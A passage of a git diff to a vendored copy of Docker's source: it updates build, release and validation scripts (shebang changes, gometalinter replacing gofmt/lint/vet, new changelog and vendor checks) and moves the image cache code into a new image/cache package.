latest="$s3Dir/$latestBase$binaryExt" - # we don't include the $binaryExt because we don't want docker.exe.zip - latestTgz="$s3Dir/$latestBase$zipExt" - fi - - if [ ! -f "$tgzDir/$tgz" ]; then - echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?" - exit 1 - fi - # disable binary uploads for now. Only providing tgz downloads - # upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest" - upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz" -} - -# Upload binaries and tgz files to S3 -release_binaries() { - [ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || { - echo >&2 './hack/make.sh must be run before release_binaries' - exit 1 - } - - for d in bundles/$VERSION/cross/*/*; do - GOARCH="$(basename "$d")" - GOOS="$(basename "$(dirname "$d")")" - release_build "$GOOS" "$GOARCH" - done - - # TODO create redirect from builds/*/i686 to builds/*/i386 - - cat <> coverage.txt + rm profile.out + fi +done diff --git a/vendor/github.com/docker/docker/hack/validate/.validate b/vendor/github.com/docker/docker/hack/validate/.validate index defa981865..32cb6b6d64 100644 --- a/vendor/github.com/docker/docker/hack/validate/.validate +++ b/vendor/github.com/docker/docker/hack/validate/.validate @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -o pipefail diff --git a/vendor/github.com/docker/docker/hack/validate/all b/vendor/github.com/docker/docker/hack/validate/all index 308af47263..9d95c2d2fd 100755 --- a/vendor/github.com/docker/docker/hack/validate/all +++ b/vendor/github.com/docker/docker/hack/validate/all @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Run all validation diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-date-descending b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending new file mode 100755 index 0000000000..b9c3368ca6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +changelogFile=${1:-CHANGELOG.md} + +if [ ! -r "$changelogFile" ]; then + echo "Unable to read file $changelogFile" >&2 + exit 1 +fi + +grep -e '^## ' "$changelogFile" | awk '{print$3}' | sort -c -r || exit 2 + +echo "Congratulations! Changelog $changelogFile dates are in descending order." diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-well-formed b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed new file mode 100755 index 0000000000..6c7ce1a1c0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +changelogFile=${1:-CHANGELOG.md} + +if [ ! -r "$changelogFile" ]; then + echo "Unable to read file $changelogFile" >&2 + exit 1 +fi + +changelogWellFormed=1 + +# e.g. "## 1.12.3 (2016-10-26)" +VER_LINE_REGEX='^## [0-9]+\.[0-9]+\.[0-9]+(-ce)? \([0-9]+-[0-9]+-[0-9]+\)$' +while read -r line; do + if ! [[ "$line" =~ $VER_LINE_REGEX ]]; then + echo "Malformed changelog $changelogFile line \"$line\"" >&2 + changelogWellFormed=0 + fi +done < <(grep '^## ' $changelogFile) + +if [[ "$changelogWellFormed" == "1" ]]; then + echo "Congratulations! Changelog $changelogFile is well-formed." +else + exit 2 +fi diff --git a/vendor/github.com/docker/docker/hack/validate/compose-bindata b/vendor/github.com/docker/docker/hack/validate/compose-bindata deleted file mode 100755 index f87728259e..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/compose-bindata +++ /dev/null @@ -1,28 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- 'cli/compose/schema/data' || true) ) -unset IFS - -if [ ${#files[@]} -gt 0 ]; then - go generate github.com/docker/docker/cli/compose/schema 2> /dev/null - # Let see if the working directory is clean - diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)" - if [ "$diffs" ]; then - { - echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs' - echo - echo "$diffs" - echo - echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`' - } >&2 - false - else - echo 'Congratulations! cli/compose/schema/bindata.go is up-to-date.' - fi -else - echo 'No cli/compose/schema/data changes in diff.' -fi diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco index 754ce8faec..f391001601 100755 --- a/vendor/github.com/docker/docker/hack/validate/dco +++ b/vendor/github.com/docker/docker/hack/validate/dco @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default index 29b96ca9a3..8ec978876d 100755 --- a/vendor/github.com/docker/docker/hack/validate/default +++ b/vendor/github.com/docker/docker/hack/validate/default @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Run default validation, exclude vendor because it's slow @@ -6,11 +6,12 @@ export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" . $SCRIPTDIR/dco . $SCRIPTDIR/default-seccomp -. $SCRIPTDIR/gofmt -. $SCRIPTDIR/lint +. $SCRIPTDIR/gometalinter . $SCRIPTDIR/pkg-imports . $SCRIPTDIR/swagger . $SCRIPTDIR/swagger-gen . $SCRIPTDIR/test-imports . $SCRIPTDIR/toml -. $SCRIPTDIR/vet +. $SCRIPTDIR/changelog-well-formed +. $SCRIPTDIR/changelog-date-descending +. $SCRIPTDIR/deprecate-integration-cli diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp index 8fe8435618..24cbf00d24 100755 --- a/vendor/github.com/docker/docker/hack/validate/default-seccomp +++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli new file mode 100755 index 0000000000..da6f8310f4 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +# Check that no new tests are being added to integration-cli + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +new_tests=$( + validate_diff --diff-filter=ACMR --unified=0 -- 'integration-cli/*_cli_*.go' | + grep -E '^\+func (.*) Test' || true +) + +if [ -z "$new_tests" ]; then + echo 'Congratulations! No new tests added to integration-cli.' + exit +fi + +echo "The following new tests were added to integration-cli:" +echo +echo "$new_tests" +echo +echo "integration-cli is deprecated. Please add an API integration test to" +echo "./integration/COMPONENT/. See ./TESTING.md for more details." +echo + +exit 1 diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt deleted file mode 100755 index 2040afa09e..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/gofmt +++ /dev/null @@ -1,33 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | - grep -v '^vendor/' | - grep -v '^cli/compose/schema/bindata.go' || true) ) -unset IFS - -badFiles=() -for f in "${files[@]}"; do - # we use "git show" here to validate that what's committed is formatted - if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then - badFiles+=( "$f" ) - fi -done - -if [ ${#badFiles[@]} -eq 0 ]; then - echo 'Congratulations! All Go source files are properly formatted.' -else - { - echo "These files are not properly gofmt'd:" - for f in "${badFiles[@]}"; do - echo " - $f" - done - echo - echo 'Please reformat the above files using "gofmt -s -w" and commit the result.' - echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter b/vendor/github.com/docker/docker/hack/validate/gometalinter new file mode 100755 index 0000000000..8f42597fce --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gometalinter @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +set -e -o pipefail + +SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +# CI platforms differ, so per-platform GOMETALINTER_OPTS can be set +# from a platform-specific Dockerfile, otherwise let's just set +# (somewhat pessimistic) default of 10 minutes. +: ${GOMETALINTER_OPTS=--deadline=10m} + +gometalinter \ + ${GOMETALINTER_OPTS} \ + --config $SCRIPTDIR/gometalinter.json ./... diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter.json b/vendor/github.com/docker/docker/hack/validate/gometalinter.json new file mode 100644 index 0000000000..81eb1017cb --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gometalinter.json @@ -0,0 +1,27 @@ +{ + "Vendor": true, + "EnableGC": true, + "Sort": ["linter", "severity", "path"], + "Exclude": [ + ".*\\.pb\\.go", + "dockerversion/version_autogen.go", + "api/types/container/container_.*", + "api/types/volume/volume_.*", + "integration-cli/" + ], + "Skip": ["integration-cli/"], + + "Enable": [ + "deadcode", + "gofmt", + "goimports", + "golint", + "gosimple", + "ineffassign", + "interfacer", + "unconvert", + "vet" + ], + + "LineLength": 200 +} diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint deleted file mode 100755 index 4ac0a33b20..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/lint +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) ) -unset IFS - -errors=() -for f in "${files[@]}"; do - failedLint=$(golint "$f") - if [ "$failedLint" ]; then - errors+=( "$failedLint" ) - fi -done - -if [ ${#errors[@]} -eq 0 ]; then - echo 'Congratulations! All Go source files have been linted.' -else - { - echo "Errors from golint:" - for err in "${errors[@]}"; do - echo "$err" - done - echo - echo 'Please fix the above errors. You can test via "golint" and commit the result.' - echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports index 9e4ea74da0..a9aab6456f 100755 --- a/vendor/github.com/docker/docker/hack/validate/pkg-imports +++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger index e754fb8cb9..0b3c2719d8 100755 --- a/vendor/github.com/docker/docker/hack/validate/swagger +++ b/vendor/github.com/docker/docker/hack/validate/swagger @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen index 008abc7e0d..07c22b5a62 100755 --- a/vendor/github.com/docker/docker/hack/validate/swagger-gen +++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" @@ -10,7 +10,7 @@ unset IFS if [ ${#files[@]} -gt 0 ]; then ${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null # Let see if the working directory is clean - diffs="$(git status --porcelain -- api/types/ 2>/dev/null)" + diffs="$(git diff -- api/types/)" if [ "$diffs" ]; then { echo 'The result of hack/generate-swagger-api.sh differs' diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports index 373caa2f29..0e836a31c0 100755 --- a/vendor/github.com/docker/docker/hack/validate/test-imports +++ b/vendor/github.com/docker/docker/hack/validate/test-imports @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # Make sure we're not using gos' Testing package any more in integration-cli export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml index a0cb158dbd..d5b2ce1c29 100755 --- a/vendor/github.com/docker/docker/hack/validate/toml +++ b/vendor/github.com/docker/docker/hack/validate/toml @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor index 0cb5aabdfa..7d753dfb6d 100755 --- a/vendor/github.com/docker/docker/hack/validate/vendor +++ b/vendor/github.com/docker/docker/hack/validate/vendor @@ -1,30 +1,55 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) -unset IFS +validate_vendor_diff(){ + IFS=$'\n' + files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) + unset IFS -if [ ${#files[@]} -gt 0 ]; then - # We run vndr to and see if we have a diff afterwards - vndr - # Let see if the working directory is clean - diffs="$(git status --porcelain -- vendor 2>/dev/null)" - if [ "$diffs" ]; then - { - echo 'The result of vndr differs' - echo - echo "$diffs" - echo - echo 'Please vendor your package with github.com/LK4D4/vndr.' - echo - } >&2 - false + if [ ${#files[@]} -gt 0 ]; then + # Remove vendor/ first so that anything not included in vendor.conf will + # cause the validation to fail. archive/tar is a special case, see vendor.conf + # for details. + ls -d vendor/* | grep -v vendor/archive | xargs rm -rf + # run vndr to recreate vendor/ + vndr + # check if any files have changed + diffs="$(git status --porcelain -- vendor 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of vndr differs' + echo + echo "$diffs" + echo + echo 'Please vendor your package with github.com/LK4D4/vndr.' + echo + } >&2 + false + else + echo 'Congratulations! All vendoring changes are done the right way.' + fi else - echo 'Congratulations! All vendoring changes are done the right way.' + echo 'No vendor changes in diff.' fi -else - echo 'No vendor changes in diff.' -fi +} + +# 1. make sure all the vendored packages are used +# 2. make sure all the packages contain license information (just warning, because it can cause false-positive) +validate_vendor_used() { + pkgs=$(mawk '/^[a-zA-Z0-9]/ { print $1 }' < vendor.conf) + for f in $pkgs; do + if ls -d vendor/$f > /dev/null 2>&1; then + found=$(find vendor/$f -iregex '.*LICENSE.*' -or -iregex '.*COPYRIGHT.*' -or -iregex '.*COPYING.*' | wc -l) + if [ $found -eq 0 ]; then + echo "WARNING: could not find copyright information for $f" + fi + else + echo "WARNING: $f is vendored but unused" + fi + done +} + +validate_vendor_diff +validate_vendor_used diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet deleted file mode 100755 index 64760489ea..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/vet +++ /dev/null @@ -1,32 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) ) -unset IFS - -errors=() -for f in "${files[@]}"; do - failedVet=$(go vet "$f") - if [ "$failedVet" ]; then - errors+=( "$failedVet" ) - fi -done - - -if [ ${#errors[@]} -eq 0 ]; then - echo 'Congratulations! All Go source files have been vetted.' -else - { - echo "Errors from go vet:" - for err in "${errors[@]}"; do - echo " - $err" - done - echo - echo 'Please fix the above errors. You can test via "go vet" and commit the result.' - echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/vendor.sh b/vendor/github.com/docker/docker/hack/vendor.sh index 9a4d038539..a7a571e7b7 100755 --- a/vendor/github.com/docker/docker/hack/vendor.sh +++ b/vendor/github.com/docker/docker/hack/vendor.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # This file is just wrapper around vndr (github.com/LK4D4/vndr) tool. # For updating dependencies you should change `vendor.conf` file in root of the diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/image/cache/cache.go similarity index 72% rename from vendor/github.com/docker/docker/daemon/cache.go rename to vendor/github.com/docker/docker/image/cache/cache.go index a2c2c137f5..6d3f4c57b5 100644 --- a/vendor/github.com/docker/docker/daemon/cache.go +++ b/vendor/github.com/docker/docker/image/cache/cache.go @@ -1,4 +1,4 @@ -package daemon +package cache // import "github.com/docker/docker/image/cache" import ( "encoding/json" @@ -6,94 +6,101 @@ import ( "reflect" "strings" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" "github.com/docker/docker/dockerversion" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/runconfig" "github.com/pkg/errors" ) -// getLocalCachedImage returns the most recent created image that is a child -// of the image with imgID, that had the same config when it was -// created. nil is returned if a child cannot be found. An error is -// returned if the parent image cannot be found. -func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) { - // Loop on the children of the given image and check the config - getMatch := func(siblings []image.ID) (*image.Image, error) { - var match *image.Image - for _, id := range siblings { - img, err := daemon.imageStore.Get(id) - if err != nil { - return nil, fmt.Errorf("unable to find image %q", id) - } - - if runconfig.Compare(&img.ContainerConfig, config) { - // check for the most up to date match - if match == nil || match.Created.Before(img.Created) { - match = img - } - } - } - return match, nil +// NewLocal returns a local image cache, based on parent chain +func NewLocal(store image.Store) *LocalImageCache { + return &LocalImageCache{ + store: store, } +} - // In this case, this is `FROM scratch`, which isn't an actual image. - if imgID == "" { - images := daemon.imageStore.Map() - var siblings []image.ID - for id, img := range images { - if img.Parent == imgID { - siblings = append(siblings, id) - } - } - return getMatch(siblings) - } +// LocalImageCache is cache based on parent chain. +type LocalImageCache struct { + store image.Store +} - // find match from child images - siblings := daemon.imageStore.Children(imgID) - return getMatch(siblings) +// GetCache returns the image id found in the cache +func (lic *LocalImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { + return getImageIDAndError(getLocalCachedImage(lic.store, image.ID(imgID), config)) } -// MakeImageCache creates a stateful image cache. -func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache { - if len(sourceRefs) == 0 { - return &localImageCache{daemon} +// New returns an image cache, based on history objects +func New(store image.Store) *ImageCache { + return &ImageCache{ + store: store, + localImageCache: NewLocal(store), } +} - cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}} +// ImageCache is cache based on history objects. Requires initial set of images. +type ImageCache struct { + sources []*image.Image + store image.Store + localImageCache *LocalImageCache +} + +// Populate adds an image to the cache (to be queried later) +func (ic *ImageCache) Populate(image *image.Image) { + ic.sources = append(ic.sources, image) +} + +// GetCache returns the image id found in the cache +func (ic *ImageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { + imgID, err := ic.localImageCache.GetCache(parentID, cfg) + if err != nil { + return "", err + } + if imgID != "" { + for _, s := range ic.sources { + if ic.isParent(s.ID(), image.ID(imgID)) { + return imgID, nil + } + } + } - for _, ref := range sourceRefs { - img, err := daemon.GetImage(ref) + var parent *image.Image + lenHistory := 0 + if parentID != "" { + parent, err = ic.store.Get(image.ID(parentID)) if err != nil { - logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) - continue + return "", errors.Wrapf(err, "unable to find image %v", parentID) } - cache.sources = append(cache.sources, img) + lenHistory = len(parent.History) } - return cache -} + for _, target := range ic.sources { + if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { + continue + } -// localImageCache is cache based on parent chain. -type localImageCache struct { - daemon *Daemon -} + if len(target.History)-1 == lenHistory { // last + if parent != nil { + if err := ic.store.SetParent(target.ID(), parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return target.ID().String(), nil + } -func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { - return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config)) -} + imgID, err := ic.restoreCachedImage(parent, target, cfg) + if err != nil { + return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + } -// imageCache is cache based on history objects. Requires initial set of images. -type imageCache struct { - sources []*image.Image - daemon *Daemon - localImageCache *localImageCache + ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm + return imgID.String(), nil + } + + return "", nil } -func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { +func (ic *ImageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { var history []image.History rootFS := image.NewRootFS() lenHistory := 0 @@ -125,21 +132,21 @@ func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *conta return "", errors.Wrap(err, "failed to marshal image config") } - imgID, err := ic.daemon.imageStore.Create(config) + imgID, err := ic.store.Create(config) if err != nil { return "", errors.Wrap(err, "failed to create cache image") } if parent != nil { - if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil { + if err := ic.store.SetParent(imgID, parent.ID()); err != nil { return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) } } return imgID, nil } -func (ic *imageCache) isParent(imgID, parentID image.ID) bool { - nextParent, err := ic.daemon.imageStore.GetParent(imgID) +func (ic *ImageCache) isParent(imgID, parentID image.ID) bool { + nextParent, err := ic.store.GetParent(imgID) if err != nil { return false } @@ -149,60 +156,25 @@ func (ic *imageCache) isParent(imgID, parentID image.ID) bool { return ic.isParent(nextParent, parentID) } -func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { - imgID, err := ic.localImageCache.GetCache(parentID, cfg) - if err != nil { - return "", err - } - if imgID != "" { - for _, s := range ic.sources { - if ic.isParent(s.ID(), image.ID(imgID)) { - return imgID, nil - } - } - } - - var parent *image.Image - lenHistory := 0 - if parentID != "" { - parent, err = ic.daemon.imageStore.Get(image.ID(parentID)) - if err != nil { - return "", errors.Wrapf(err, "unable to find image %v", parentID) - } - lenHistory = len(parent.History) - } - - for _, target := range ic.sources { - if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { - continue - } - - if len(target.History)-1 == lenHistory { // last - if parent != nil { - if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil { - return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) - } +func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { + layerIndex := 0 + for i, h := range image.History { + if i == index { + if h.EmptyLayer { + return "" } - return target.ID().String(), nil + break } - - imgID, err := ic.restoreCachedImage(parent, target, cfg) - if err != nil { - return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + if !h.EmptyLayer { + layerIndex++ } - - ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm - return imgID.String(), nil } - - return "", nil + return image.RootFS.DiffIDs[layerIndex] // validate? } -func getImageIDAndError(img *image.Image, err error) (string, error) { - if img == nil || err != nil { - return "", err - } - return img.ID().String(), nil +func isValidConfig(cfg *containertypes.Config, h image.History) bool { + // todo: make this format better than join that loses data + return strings.Join(cfg.Cmd, " ") == h.CreatedBy } func isValidParent(img, parent *image.Image) bool { @@ -215,7 +187,7 @@ func isValidParent(img, parent *image.Image) bool { if len(parent.History) >= len(img.History) { return false } - if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) { + if len(parent.RootFS.DiffIDs) > len(img.RootFS.DiffIDs) { return false } @@ -232,23 +204,50 @@ func isValidParent(img, parent *image.Image) bool { return true } -func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { - layerIndex := 0 - for i, h := range image.History { - if i == index { - if h.EmptyLayer { - return "" +func getImageIDAndError(img *image.Image, err error) (string, error) { + if img == nil || err != nil { + return "", err + } + return img.ID().String(), nil +} + +// getLocalCachedImage returns the most recent created image that is a child +// of the image with imgID, that had the same config when it was +// created. nil is returned if a child cannot be found. An error is +// returned if the parent image cannot be found. +func getLocalCachedImage(imageStore image.Store, imgID image.ID, config *containertypes.Config) (*image.Image, error) { + // Loop on the children of the given image and check the config + getMatch := func(siblings []image.ID) (*image.Image, error) { + var match *image.Image + for _, id := range siblings { + img, err := imageStore.Get(id) + if err != nil { + return nil, fmt.Errorf("unable to find image %q", id) + } + + if compare(&img.ContainerConfig, config) { + // check for the most up to date match + if match == nil || match.Created.Before(img.Created) { + match = img + } } - break } - if !h.EmptyLayer { - layerIndex++ + return match, nil + } + + // In this case, this is `FROM scratch`, which isn't an actual image. + if imgID == "" { + images := imageStore.Map() + var siblings []image.ID + for id, img := range images { + if img.Parent == imgID { + siblings = append(siblings, id) + } } + return getMatch(siblings) } - return image.RootFS.DiffIDs[layerIndex] // validate? -} -func isValidConfig(cfg *containertypes.Config, h image.History) bool { - // todo: make this format better than join that loses data - return strings.Join(cfg.Cmd, " ") == h.CreatedBy + // find match from child images + siblings := imageStore.Children(imgID) + return getMatch(siblings) } diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/image/cache/compare.go similarity index 82% rename from vendor/github.com/docker/docker/runconfig/compare.go rename to vendor/github.com/docker/docker/image/cache/compare.go index 708922f986..e31e9c8bdf 100644 --- a/vendor/github.com/docker/docker/runconfig/compare.go +++ b/vendor/github.com/docker/docker/image/cache/compare.go @@ -1,10 +1,12 @@ -package runconfig +package cache // import "github.com/docker/docker/image/cache" -import "github.com/docker/docker/api/types/container" +import ( + "github.com/docker/docker/api/types/container" +) -// Compare two Config struct. Do not compare the "Image" nor "Hostname" fields +// compare two Config struct. Do not compare the "Image" nor "Hostname" fields // If OpenStdin is set, then it differs -func Compare(a, b *container.Config) bool { +func compare(a, b *container.Config) bool { if a == nil || b == nil || a.OpenStdin || b.OpenStdin { return false diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/image/cache/compare_test.go similarity index 68% rename from vendor/github.com/docker/docker/runconfig/compare_test.go rename to vendor/github.com/docker/docker/image/cache/compare_test.go index 6370d7a887..939e99f050 100644 --- a/vendor/github.com/docker/docker/runconfig/compare_test.go +++ b/vendor/github.com/docker/docker/image/cache/compare_test.go @@ -1,4 +1,4 @@ -package runconfig +package cache // import "github.com/docker/docker/image/cache" import ( "testing" @@ -46,9 +46,9 @@ func TestCompare(t *testing.T) { sameConfigs := map[*container.Config]*container.Config{ // Empty config - &container.Config{}: {}, + {}: {}, // Does not compare hostname, domainname & image - &container.Config{ + { Hostname: "host1", Domainname: "domain1", Image: "image1", @@ -60,23 +60,23 @@ func TestCompare(t *testing.T) { User: "user", }, // only OpenStdin - &container.Config{OpenStdin: false}: {OpenStdin: false}, + {OpenStdin: false}: {OpenStdin: false}, // only env - &container.Config{Env: envs1}: {Env: envs1}, + {Env: envs1}: {Env: envs1}, // only cmd - &container.Config{Cmd: cmd1}: {Cmd: cmd1}, + {Cmd: cmd1}: {Cmd: cmd1}, // only labels - &container.Config{Labels: labels1}: {Labels: labels1}, + {Labels: labels1}: {Labels: labels1}, // only exposedPorts - &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1}, + {ExposedPorts: ports1}: {ExposedPorts: ports1}, // only entrypoints - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint1}, // only volumes - &container.Config{Volumes: volumes1}: {Volumes: volumes1}, + {Volumes: volumes1}: {Volumes: volumes1}, } differentConfigs := map[*container.Config]*container.Config{ nil: nil, - &container.Config{ + { Hostname: "host1", Domainname: "domain1", Image: "image1", @@ -88,38 +88,38 @@ func TestCompare(t *testing.T) { User: "user2", }, // only OpenStdin - &container.Config{OpenStdin: false}: {OpenStdin: true}, - &container.Config{OpenStdin: true}: {OpenStdin: false}, + {OpenStdin: false}: {OpenStdin: true}, + {OpenStdin: true}: {OpenStdin: false}, // only env - &container.Config{Env: envs1}: {Env: envs2}, + {Env: envs1}: {Env: envs2}, // only cmd - &container.Config{Cmd: cmd1}: {Cmd: cmd2}, + {Cmd: cmd1}: {Cmd: cmd2}, // not the same number of parts - &container.Config{Cmd: cmd1}: {Cmd: cmd3}, + {Cmd: cmd1}: {Cmd: cmd3}, // only labels - &container.Config{Labels: labels1}: {Labels: labels2}, + {Labels: labels1}: {Labels: labels2}, // not the same number of labels - &container.Config{Labels: labels1}: {Labels: labels3}, + {Labels: labels1}: {Labels: labels3}, // only exposedPorts - &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2}, + {ExposedPorts: ports1}: {ExposedPorts: ports2}, // not the same number of ports - 